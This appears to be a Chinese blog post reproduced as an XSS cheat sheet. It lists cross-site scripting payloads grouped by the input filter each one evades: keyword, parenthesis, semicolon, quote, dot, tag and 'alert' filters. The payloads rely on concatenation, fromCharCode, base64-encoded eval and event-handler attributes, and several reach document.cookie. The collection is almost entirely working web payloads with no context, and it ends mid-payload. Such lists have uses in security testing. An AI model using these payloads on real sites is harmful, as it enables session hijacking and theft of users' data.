Reflected XSS
Persistent XSS
DOM-based XSS
Mutation XSS
Universal Cross-site Scripting (UXSS)
通用跨站脚本攻击(UXSS)
<marquee>Mannix</marquee>
">"><script>with(document)alert(cookie)</script><"<"
javascript关键字过滤 +加号过滤
# document.cookie
document['coo'['CONCAT'.toLowerCase()]('kie')]
<script>alert(document['coo'['CONCAT'.toLowerCase()]('kie')])</script>
<script>alert(document['dom'['CONCAT'.toLowerCase()]('ain')])</script>
圆括号过滤
# alert(1)
alert`1`
;分号过滤
<img src=1 one rror=alert(1)>
单、双、反引号过滤
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//
<script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//</script>
.过滤
with(location)alert(hash)
<script>with(location)alert(hash)</script>
<script>with(document)alert(cookie)</script>
html标签过滤、属性名过滤
<video width="0" height="0" oncanplay=alert`0`>
<source src="http://www.runoob.com/try/demo_source/mov_bbb.mp4" type="video/mp4"></video>
<details ontoggle=alert(1) open>
<marquee onscroll=alert(document.domain)>
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
过滤alert
<script>window['alert'](1)</script>
<script>window['ale'+'rt'](1)</script>
<script>window["alert"](1)</script>
<script>window[`alert`](1)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](1)</script>
<script>top['alert'](1)</script>
<script>frames['alert'](1)</script>
<script>self.frames['alert'](1)</script>
<script>self.parent['alert'](1)</script>
<script>self.top['alert'](1)</script>
top['aler'+'t'](1)
[1].find(confirm)
[1].map(confirm)
[1].some(confirm)
[1].every(confirm)
[1].filter(confirm)
[1].findIndex(confirm)
[1].map(alert)
[1].find(alert)
[1].every(alert)
[1].filter(alert)
[1].findIndex(alert)
[1].some(alert)
<script>[document.cookie].map(alert)</script>
<script>[1].map(alert)</script>
alert(document.domain)
YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==
<svg onl oad=eval(atob`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`)>
<svg onl oad=eval(atob`YWxlcnQoMSk=`)>
<svg onl oad=setTimeout(atob`YWxlcnQoMSk=`)>
<svg onl oad=setInterval(atob`YWxlcnQoMSk=`)>
<svg onl oad='new Function(atob`YWxlcnQoMSk=`)()'>
<svg onl oad=self[`ev`+`al`](atob`YWxlcnQoMSk=`)>
<script>document.write("<s","crip","t>al","ert(","1)","</s","cript>")</script>
<script>atob.constructor(atob`YWxlcnQoMSk`)``</script>
<script>atob.constructor(atob(/YWxlcnQoMSk/.source))()</script>
<script>window[Symbol.hasInstance]=eval
atob`YWxlcnQoMSk` instanceof window</script>
<script>atob.constructor(unescape([...escape((
标签:XSS,php,xss,alert,Injection,document,com,注入 From: https://www.cnblogs.com/jerry-autumn/p/16858967.html